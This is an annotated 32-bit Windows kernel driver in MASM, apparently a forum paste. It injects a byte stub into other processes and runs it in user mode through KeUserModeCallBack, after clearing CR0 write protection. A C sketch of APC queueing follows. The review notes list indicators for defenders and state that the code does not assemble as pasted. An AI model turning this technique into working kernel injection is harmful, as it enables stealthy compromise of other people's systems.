; ---------------------------------------------------------------------------
; Review notes added; the code itself is unchanged.
;
; Target : 32-bit Windows kernel-mode driver (.386, flat, stdcall) built with
;          the MASM32 "w2k" kernel headers and linked against ntoskrnl.lib.
; Purpose: DriverEntry registers a process-creation notify routine
;          (NotifyRoutine).  From that callback the driver attaches to another
;          process, reads its PEB through hard-coded KTHREAD/EPROCESS/PEB
;          offsets, allocates user-mode memory with NtAllocateVirtualMemory,
;          copies the `myproc` byte stub into it and invokes it through
;          KeUserModeCallBack (CallToUserMode / AttackProcess).
; Defender notes: behaviours in this file worth alerting on are the CR0.WP
;          clear/restore, KeAttachProcess from inside a notify callback, a
;          kernel-issued NtAllocateVirtualMemory with handle -1, and a
;          KeUserModeCallBack whose ApiNumber is derived from an address
;          outside PEB.KernelCallbackTable.
; Caveat : several identifiers in this paste are referenced under a spelling or
;          case that differs from their declaration (option casemap:none makes
;          case significant); treat it as a forum fragment, not a build unit.
; ---------------------------------------------------------------------------
.386
.model flat, stdcall
option casemap:none                     ; symbol names are case-sensitive from here on

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; I N C L U D E   F I L E S
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NOTE(review): backslashes appear doubled relative to the usual KmdKit sources
; (both in the include paths and in the string literals below); this looks like
; an escaping artefact of the forum rendering -- confirm against the original.
include \\masm32\\include\\w2k\\ntstatus.inc
include \\masm32\\include\\w2k\\ntddk.inc
include \\masm32\\include\\w2k\\ntoskrnl.inc
includelib \\masm32\\lib\\w2k\\ntoskrnl.lib
include \\masm32\\Macros\\Strings.mac   ; supplies the $CTA0 inline-string macro used below
include useful.asm                      ; not shown here; presumably supplies GetImageFilePath,
                                        ; IMAGE_FILE_PATH_LEN and __strcmpi -- verify

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; R E A D   O N L Y   D A T A
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.const
; Counted UNICODE_STRINGs for the device object and its Win32-visible symbolic link.
CCOUNTED_UNICODE_STRING "\\\\Device\\\\ring3code", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\\\DosDevices\\\\ring3code", g_usSymbolicLinkName, 4
; Image name that NotifyRoutine compares each looked-up process against
; (case-insensitively, via __strcmpi).
Target db "Explorer.exe",0

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; U N I N I T I A L I Z E D   D A T A
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.data?
g_dwImageFileNameOffset DWORD ?         ; written by DriverEntry from GetImageFileNameOffset;
                                        ; never read anywhere in this file
g_fbNotifyRoutineSet BOOL ?             ; cleared in DriverEntry, never set or tested afterwards
szProcessName CHAR IMAGE_FILE_PATH_LEN dup(?)   ; ANSI copy of the looked-up image path (NotifyRoutine)
notAttack BOOL ?                        ; cleared in DriverEntry and after a successful AttackProcess;
                                        ; NotifyRoutine tests a differently spelled `notAttacked`

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; C O D E
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; Myproc !!@!! I Just Code For Fan~~~ MayBe Error~~~
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; `myproc` is never called in kernel mode.  CallToUserMode copies the bytes
; between `myproc` and `myproc + length_myproc` with rep movsb into the target
; process and has the kernel run them there.  The bytes are copied unchanged, so
; the direct call that `invoke` expands to still refers to this image, and
; MessageBox / hDlg are user-mode names that nothing in this kernel build
; declares -- the author's own comments below say as much.
myproc:
;please using Api Reloc before Call apiz
;even then u could restore kernel32.dll imagebase to ur code in ring0 bcz i got peb for u ~
;i was just coding something here to test my code can go to ring3~
;if it was call in ring0 it would crash down the system ~ but in ring3 all it would make a msgbox or
; an error for u to know code runs under ring3~
        invoke  MessageBox, hDlg, $CTA0("Sure want to exit?"), $CTA0("Exit Confirmation"), MB_YESNO + MB_ICONQUESTION + MB_DEFBUTTON1
        retn
length_myproc =$ - myproc               ; byte length of the stub, passed to CallToUserMode

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DisableWriteProtect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD DisableWriteProtect(void)
; Clears CR0.WP (bit 16) so that supervisor-mode writes ignore page-level write
; protection.  There is no cli/sti or IRQL change around the modification.
; Out:   eax = CR0 value before the change (fed back to EnableWriteProtect)
; Notes: nothing in this file writes to read-only kernel memory between the
;        clear and the restore, so the purpose of the toggle is not evident from
;        this file.  The push/pop of eax is moot: eax is reloaded from uAttr
;        right after the pop.
DisableWriteProtect proc
        Local   uAttr:Dword
        push    eax
        mov     eax, cr0
        mov     uAttr, eax              ; remember the original CR0 for the caller
        and     eax, 0FFFEFFFFh         ; // CR0 16 BIT = 0  -- bit 16 = WP
        mov     cr0, eax
        pop     eax
        mov     eax,uAttr               ; return the saved CR0
        ret
DisableWriteProtect Endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; EnableWriteProtect
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; void EnableWriteProtect(DWORD uOldAttr)
; Writes uOldAttr (the value DisableWriteProtect returned) back to CR0.
; NOTE(review): `ret 04h` is explicit inside a PROC that has one stdcall
; argument, for which MASM emits its own epilogue as well -- confirm in a
; listing that the argument is popped exactly once.
EnableWriteProtect proc uOldAttr:dword
        push    eax
        mov     eax, uOldAttr
        mov     cr0, eax                ; restore WP (and any other bit) as saved
        pop     eax
        ret     04h
EnableWriteProtect endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchCreateClose
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NTSTATUS DispatchCreateClose(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
; IRP_MJ_CREATE / IRP_MJ_CLOSE handler: completes the IRP with STATUS_SUCCESS and
; Information = 0.  No per-open check is performed here; whatever the object
; manager allowed to open the device is accepted.
; Out:   eax = STATUS_SUCCESS
DispatchCreateClose proc pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
        mov     ecx, pIrp
        mov     (_IRP PTR [ecx]).IoStatus.Status, STATUS_SUCCESS
        and     (_IRP PTR [ecx]).IoStatus.Information, 0
        fastcall IofCompleteRequest, ecx, IO_NO_INCREMENT    ; the IRP must not be touched after this
        mov     eax, STATUS_SUCCESS
        ret
DispatchCreateClose endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetUserPEB
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; out: eax - *peb
; PVOID GetUserPEB(void)
; Walks KPCR -> KTHREAD -> EPROCESS -> PEB with hard-coded x86 offsets.
; fs:[124h] is the current-thread slot of the 32-bit KPCR; per the author's
; comments [KTHREAD+134h] is the trap frame and [EPROCESS+1b0h] the Peb;
; [KTHREAD+44h] is presumably the owning EPROCESS (ApcState.Process) -- confirm
; for the target build.  These offsets match one kernel generation only
; (w2k/XP-era, per the includes) and are not stable across builds; on another
; build they read the wrong fields.
; Out:   eax = PEB pointer, or 0 when the thread has no trap frame (kernel
;        thread) or the process has no PEB.  ZF = 1 exactly when eax = 0 on
;        return; AttackProcess relies on that flag surviving the call.
; Clobb: eax, flags (ebx is preserved).
; NOTE(review): the jump operand is spelled `GetUserPEB_End` while the label is
; `GetUserPEB_end`; under option casemap:none these are different symbols.
GetUserPEB proc near
        assume  fs:nothing
        push    ebx
        mov     ebx, dword ptr fs:[124h]    ; ebx = current KTHREAD (KPCR.PrcbData.CurrentThread)
        mov     eax, dword ptr [ebx+134h] ; gimme KTRAP_FRAME
; no ktrap_frame if called from kernel mode
; (from non user mode thread)
        test    eax, eax
        jz      GetUserPEB_End          ; (case differs from the label below)
        mov     eax, dword ptr [ebx+44h]    ; eax = owning process -- hard-coded offset, see header
        mov     eax, dword ptr [eax+1b0h]   ; eax = EPROCESS.Peb -- hard-coded offset
; peb for non user mode threadz null too
        test    eax, eax                ; leaves ZF for the caller: ZF=1 <=> no PEB
GetUserPEB_end:
        pop     ebx
        retn
GetUserPEB endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; CallToUserMode
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD CallToUserMode(PVOID lpPeb, DWORD dwAddr, DWORD dwSize)
; Must run while attached to the target process (AttackProcess attaches first).
;   1. reads PEB.KernelCallbackTable ([lpPeb+2ch]);
;   2. NtAllocateVirtualMemory(-1, &base, 0, &size, MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN,
;      PAGE_READWRITE) -- a kernel-issued user-mode allocation in the attached process;
;   3. rep movsb copies dwSize bytes from dwAddr (this kernel image) into it;
;   4. KeUserModeCallBack(ApiNumber, InputBuffer, InputLength=0, &OutputBuffer,
;      &OutputLength) with ApiNumber = (base - KernelCallbackTable) / 4, i.e. an
;      index computed from the allocation's distance to the table rather than a
;      real table entry (argument roles per the usual prototype -- confirm);
;   5. NtFreeVirtualMemory(-1, ..., MEM_DECOMMIT).
; Out:   eax = NtAllocateVirtualMemory status when it fails (early exit), else the
;        NtFreeVirtualMemory status.
; Clobb: eax, ecx, edx, flags; esi/edi are saved and restored around the copy.
; Review notes (code left as is):
;   - several locals are referenced under a name that differs from their
;     declaration (`lpPEB` vs `lpPeb`, `kernel_callback_table` vs
;     `kernel_callback_tableb`) and `allocation_size` is not declared at all;
;     `mov allocation_size, (dwSize+1024)` is also a memory-to-memory move.  As
;     pasted the routine does not assemble.
;   - the allocation call passes &base_address / &allocation_size, the free call
;     pushes their values; compare with the NtFreeVirtualMemory prototype.
;   - `leave` is explicit before a `ret` in a PROC with locals, for which MASM
;     emits its own epilogue -- confirm the frame is torn down once.
;   - the commented-out ecx/edx saves have no matching restore.
CallToUserMode proc lpPeb:PVOID, dwAddr:DWORD, dwSize:DWORD
        local   kernel_callback_tableb:dword    ; (referenced below as kernel_callback_table)
        local   ecx_on_return:dword             ; receives OutputLength from KeUserModeCallBack
        local   edx_on_return:dword             ; passed both as InputBuffer and as &OutputBuffer
        local   base_address:dword              ; user-mode allocation in the attached process
; mov ecx_on_retrun,ecx
; mov edx_on_retrun,edx
        mov     eax,lpPEB                       ; (declared as lpPeb)
        mov     eax, dword ptr [eax+2ch] ; *KernelCallbackTable
        mov     kernel_callback_table, eax
        and     base_address, 0                 ; let the kernel pick the address
        push    PAGE_READWRITE                  ; Protect
        push    MEM_COMMIT or MEM_TOP_DOWN or MEM_RESERVE   ; AllocationType
        lea     eax, allocation_size            ; (not declared in this proc)
        mov     allocation_size, (dwSize+1024)  ; RegionSize = stub + 1 KiB slack
        push    eax                             ; &RegionSize
        lea     eax, base_address
        push    0                               ; ZeroBits
        push    eax                             ; &BaseAddress
        push    -1                              ; ProcessHandle = current (attached) process
        call    NtAllocateVirtualMemory
        test    eax, eax
        jnz     CallToUserMode_End              ; allocation failed: return its status
        mov     edx, base_address
        mov     edi, edx                        ; edi = user-mode destination
        push    edi                             ; esi/edi are callee-saved under stdcall
        push    esi
        mov     esi, dwAddr                     ; copy the to user-mode: esi = kernel source
        push    dwSize
        pop     ecx                             ; ecx = byte count
        rep     movsb                           ; copy the stub into the target process
        pop     esi
        pop     edi
        mov     eax, kernel_callback_table
;mov edx, base_address
        sub     edx, eax                        ; edx = base_address - KernelCallbackTable
        shr     edx, 2                          ; ... as a DWORD index = ApiNumber
        lea     ecx,ecx_on_return
        push    ecx                             ; &OutputLength
        lea     eax, edx_on_return
        push    eax                             ; &OutputBuffer
        push    0                               ; InputLength
        lea     eax, edx_on_return
        push    eax                             ; InputBuffer
;stack start
;where to start code user mode
        push    edx                             ; ApiNumber
        call    KeUserModeCallBack              ; transitions to user mode in the attached process
CallToUserMode_Free_Mem:
        push    MEM_DECOMMIT                    ; FreeType
        mov     eax, allocation_size
        push    eax                             ; value, not &allocation_size -- see header
        mov     eax, base_address
        push    eax                             ; value, not &base_address -- see header
        push    -1                              ; ProcessHandle
        call    NtFreeVirtualMemory
CallToUserMode_End:
        leave                                   ; explicit teardown ahead of MASM's epilogue -- see header
        ret
CallToUserMode endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; AttackProcess
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NTSTATUS AttackProcess(PEPROCESS pEpr)
; KeAttachProcess(pEpr), clear CR0.WP, locate the PEB, run CallToUserMode with the
; `myproc` stub, then restore CR0 and detach.
; Out:   eax = STATUS_SUCCESS on the normal path.  On the GetUserPEB failure
;        path eax is what GetUserPEB left (0), which is numerically equal to
;        STATUS_SUCCESS, so NotifyRoutine cannot tell the two apart.
; Review notes (code left as is):
;   - KeAttachProcess is declared VOID in the DDK, so the status test right
;     after it examines a leftover eax -- confirm against ntoskrnl.inc.
;   - the GetUserPEB failure path jumps past EnableWriteProtect and
;     KeDetachProcess: CR0.WP stays cleared and the thread stays attached.
;   - `jz Attack_End_err:` carries a trailing colon on its operand and
;     `EnableWriteProcect` does not match the routine's name; as pasted this
;     does not assemble.
AttackProcess proc pEpr:PVOID
        local   oldArr:DWORD            ; CR0 before WP was cleared
        invoke  KeAttachProcess,pEpr    ; VOID in the DDK -- eax below is not a status
        .if eax == STATUS_SUCCESS
            invoke  DisableWriteProtect
            mov     oldArr,eax
            invoke  GetUserPEB          ; eax = PEB, ZF=1 if none (see GetUserPEB)
            jz      Attack_End_err:     ; skips the CR0 restore and KeDetachProcess below
            invoke  CallToUserMode, eax, addr myproc, length_myproc
            invoke  EnableWriteProcect,oldArr   ; (routine is named EnableWriteProtect)
            invoke  KeDetachProcess
        .endif
Attack_End:
        mov     eax, STATUS_SUCCESS
Attack_End_err:
        ret
AttackProcess endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NotifyRoutine
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; VOID NotifyRoutine(HANDLE dwParentId, HANDLE dwProcessId, BOOLEAN bCreate)
; Registered with PsSetCreateProcessNotifyRoutine (DriverEntry); invoked for
; every process creation and exit.  bCreate is loaded into eax but never tested,
; so exits are handled exactly like creations.
; Flow: look up the *parent* EPROCESS first, falling back to the new process;
;       fetch its image path (GetImageFilePath -- not in this file, presumably
;       useful.asm), convert it to ANSI into szProcessName, compare it
;       case-insensitively with `Target` ("Explorer.exe") and, subject to the
;       flag test below, call AttackProcess.  The looked-up object is released
;       with ObfDereferenceObject on every path that referenced it.
; Per the DDK a create-process notify routine runs in the creating thread's
; context at PASSIVE_LEVEL; AttackProcess attaches to another process and calls
; into user mode from inside that callback.
; Review notes (code left as is):
;   - __strcmpi returns 0 on a match, so `.if eax` is true when the names
;     DIFFER, i.e. for every process that is not Explorer.exe.
;   - `.if notAttacked` names a symbol that is not declared; the declared flag is
;     `notAttack`, which DriverEntry and this routine only ever clear.
;   - the second PsLookupProcessByProcessId has no matching `push eax`, so its
;     out-pointer (esp) and the following `pop peProcess` address the bottom of
;     the local frame instead of a reserved slot; esp ends up one DWORD above
;     where the prologue left it, so later pushes may overlap the lowest local.
;   - ExFreePool(us.Buffer) assumes GetImageFilePath pool-allocated the buffer
;     -- confirm in useful.asm.
NotifyRoutine proc dwParentId:DWORD, dwProcessId:DWORD, bCreate:BOOL ; BOOLEAN
        local   peProcess:PVOID ; PEPROCESS
        local   fbDereference:BOOL      ; TRUE once PsLookupProcessByProcessId took a reference
        local   us:UNICODE_STRING       ; image path as returned by GetImageFilePath
        local   as:ANSI_STRING          ; ANSI view over szProcessName
        push    eax ; reserve DWORD on stack
        invoke  PsLookupProcessByProcessId, dwParentId, esp
        pop     peProcess ; -> EPROCESS
        .if eax == STATUS_SUCCESS
            mov     fbDereference, TRUE ; PsLookupProcessByProcessId references process object
        .else
            invoke  PsLookupProcessByProcessId, dwProcessId, esp    ; no reserved slot this time -- see header
            pop     peProcess ; -> EPROCESS
            .if eax == STATUS_SUCCESS
                mov     fbDereference, TRUE
            .else
                ret                     ; neither lookup succeeded; nothing to release
            .endif
        .endif
        mov     eax, bCreate            ; loaded but never tested
        invoke  GetImageFilePath, peProcess, addr us
        .if eax == STATUS_SUCCESS
            lea     eax, szProcessName
            mov     as.Buffer, eax
            mov     as.MaximumLength, IMAGE_FILE_PATH_LEN
            and     as._Length, 0
            invoke  RtlUnicodeStringToAnsiString, addr as, addr us, FALSE   ; FALSE: convert into our buffer
            invoke  ExFreePool, us.Buffer
            lea     eax, szProcessName
            invoke  __strcmpi, eax, addr Target
            .if eax                     ; non-zero = names differ (see header)
                .if notAttacked         ; (undeclared; the flag declared is notAttack)
                    invoke  AttackProcess,peProcess
                    .if eax == STATUS_SUCCESS
                        mov     notAttack,FALSE
                    .endif
                .endif
            .endif
        .endif
        .if fbDereference
            fastcall ObfDereferenceObject, peProcess
        .endif
        ret
NotifyRoutine endp
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DispatchControl
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NTSTATUS DispatchControl(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
; IRP_MJ_DEVICE_CONTROL handler.  Every IOCTL is completed with
; STATUS_INVALID_DEVICE_REQUEST and Information = 0: the device exposes no
; control surface, so the driver's injection is triggered solely by the
; process-notify path (NotifyRoutine), not by user-mode requests.
; The current stack location is fetched into edi but never used.
; Out:   eax = the status stored in the IRP (STATUS_INVALID_DEVICE_REQUEST)
DispatchControl proc uses esi edi pDeviceObject:PDEVICE_OBJECT, pIrp:PIRP
        mov     esi, pIrp
        assume  esi:ptr _IRP
; Initialize to failure.
        mov     [esi].IoStatus.Status, STATUS_UNSUCCESSFUL
        and     [esi].IoStatus.Information, 0
        IoGetCurrentIrpStackLocation esi
        mov     edi, eax                ; edi = IO_STACK_LOCATION (unused below)
        assume  edi:ptr IO_STACK_LOCATION
        mov     [esi].IoStatus.Status, STATUS_INVALID_DEVICE_REQUEST   ; overrides the initial failure status
; After IoCompleteRequest returns, the IRP pointer
; is no longer valid and cannot safely be dereferenced.
        push    [esi].IoStatus.Status   ; keep a copy of the status before completion
        assume  edi:nothing
        assume  esi:nothing
        fastcall IofCompleteRequest, esi, IO_NO_INCREMENT
        pop     eax ; [esi].IoStatus.Status
        ret
DispatchControl endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverUnload
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
; Removes the process-notify callback, deletes the symbolic link and the device.
; The callback is removed unconditionally: DriverEntry neither checks the
; registration's return value nor sets g_fbNotifyRoutineSet, so there is no
; record of whether the registration actually succeeded.
DriverUnload proc pDriverObject:PDRIVER_OBJECT
        invoke  PsSetCreateProcessNotifyRoutine, NotifyRoutine, TRUE    ; TRUE = remove
        invoke  IoDeleteSymbolicLink, addr g_usSymbolicLinkName
        mov     eax, pDriverObject
        invoke  IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
        ret
DriverUnload endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; D I S C A R D A B L E   C O D E
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
.code INIT                              ; discarded after DriverEntry returns

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; GetImageFileNameOffset
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DWORD GetImageFileNameOffset(void)
; Scans the first page of the current EPROCESS (DriverEntry runs in the System
; process context) for the 6-byte, case-insensitive string "system" and returns
; the offset at which it was found.
; Out:   eax = offset into EPROCESS, or 0 when not found.  A genuine match at
;        offset 0 is indistinguishable from "not found" (DriverEntry notes this).
; Notes: the result is stored in g_dwImageFileNameOffset but never consumed in
;        this file -- NotifyRoutine obtains the image path via GetImageFilePath
;        instead.  When the loop runs out, eax holds the last _strnicmp result
;        (non-zero), which is what steers the .if below.
GetImageFileNameOffset proc uses esi ebx
; Finds EPROCESS.ImageFileName field offset
; W2K EPROCESS.ImageFileName = 01FCh
; WXP EPROCESS.ImageFileName = 0174h
; WNET EPROCESS.ImageFileName = 0154h
; Instead of hardcoding above offsets we just scan
; the EPROCESS structure of System process one page down.
; It's a well-known trick.
        invoke  IoGetCurrentProcess
        mov     esi, eax                ; esi = EPROCESS of the current (System) process
        xor     ebx, ebx                ; ebx = candidate offset
        .while ebx < 1000h ; one page more than enough.
; Case insensitive compare.
            lea     eax, [esi+ebx]
            invoke  _strnicmp, eax, $CTA0("system"), 6
            .break .if eax == 0
            inc     ebx
        .endw
        .if eax == 0 ; Found.
            mov     eax, ebx
        .else ; Not found.
            xor     eax, eax
        .endif
        ret
GetImageFileNameOffset endp

;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; DriverEntry
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Creates an exclusive FILE_DEVICE_UNKNOWN device (characteristics 0, default
; security), its DosDevices symbolic link, installs the dispatch routines and
; DriverUnload, then registers NotifyRoutine as a create-process callback.
; Out:   eax = STATUS_SUCCESS, or STATUS_DEVICE_CONFIGURATION_ERROR when the
;        device or the symbolic link could not be created (the device is deleted
;        again in the latter case).
; Notes: the return value of PsSetCreateProcessNotifyRoutine is not checked and
;        g_fbNotifyRoutineSet is only ever cleared; DriverUnload therefore
;        removes the callback blindly.  pusRegistryPath is unused.
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
        local   status:NTSTATUS
        local   pDeviceObject:PDEVICE_OBJECT
        mov     status, STATUS_DEVICE_CONFIGURATION_ERROR   ; pessimistic default
        invoke  IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, TRUE, addr pDeviceObject
        .if eax == STATUS_SUCCESS
            invoke  IoCreateSymbolicLink, addr g_usSymbolicLinkName, addr g_usDeviceName
            .if eax == STATUS_SUCCESS
                mov     eax, pDriverObject
                assume  eax:ptr DRIVER_OBJECT
                mov     [eax].MajorFunction[IRP_MJ_CREATE*(sizeof PVOID)], offset DispatchCreateClose
                mov     [eax].MajorFunction[IRP_MJ_CLOSE*(sizeof PVOID)], offset DispatchCreateClose
                mov     [eax].MajorFunction[IRP_MJ_DEVICE_CONTROL*(sizeof PVOID)], offset DispatchControl
                mov     [eax].DriverUnload, offset DriverUnload
                assume  eax:nothing
                mov     notAttack,FALSE
                and     g_fbNotifyRoutineSet, FALSE
                invoke  PsSetCreateProcessNotifyRoutine, NotifyRoutine, FALSE   ; FALSE = register; result unchecked
                invoke  GetImageFileNameOffset
                mov     g_dwImageFileNameOffset, eax ; it can be not found and equal to 0, btw
                mov     status, STATUS_SUCCESS
            .else
                invoke  IoDeleteDevice, pDeviceObject   ; symbolic link failed: undo the device
            .endif
        .endif
        mov     eax, status
        ret
DriverEntry endp

; ---- The text below is the start of a separate C/pseudo-code fragment from the
; ---- same post (a KeInitializeApc prototype followed by an APC-queueing sketch).
; ---- It continues on the next line, is not MASM input, and is left as pasted.
VOID KeInitializeApc ( IN PRKAPC Apc, IN PRKTHREAD Thread, IN KAPC_ENVIRONMENT Environment, IN PKKERNEL_ROUTINE KernelRoutine, IN PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, IN
PKNORMAL_ROUTINE NormalRoutine OPTIONAL, IN KPROCESSOR_MODE ApcMode OPTIONAL IN PVOID NormalContext OPTIONAL ) .............. BOOLEAN KeInsertQueueApc ( IN PRKAPC Apc,//OurApc IN PVOID SystemArgument1,//Ring3App-arg2 IN PVOID SystemArgument2,//Ring3App-arg3 IN KPRIORITY Increment//0 ) Ring3:: void Ring3App(ulong arg1,ulong arg2,ulong arg3); kernel mode APC void MyApcRoutine(struct _KAPC *Apc, PKNORMAL_ROUTINE norm_routine, void *context,//arg1 void *SysArg1,//arg2 void *SysArg2)//arg3 { ExFreePool(Apc); return; } //in kernel mode PKAPC OurApc; void SendApc(ulong addr,ulong arg1,ulong arg2,ulong arg3) { PKTHREAD thread=KeGetCurrentThread(); OurApc=ExAllocatePool(NonPagedPool, sizeof(struct _KAPC)); KeInitializeApc(OurApc, thread, 0, (PKKERNEL_ROUTINE)&MyApcRoutine, 0, (PKNORMAL_ROUTINE)addr, 1, (PVOID)arg1); KeInsertQueueApc(OurApc, (PVOID)arg2, (PVOID)arg3, 0); *((unsigned char *)thread+0x4a)=1 return ; } //in user mode void Ring3App(ulong arg1,ulong arg2,ulong arg3) { .... } void SendQp(..) { .... SendBuf = BuildUpIrp(IRP_XXX_YYYY); SendBuf->BackAddr=(ULONG)Ring3App; .... ReturnBuf = SendIrp(hDevice,SendBuf,sizeof(SendBuf)); .... ....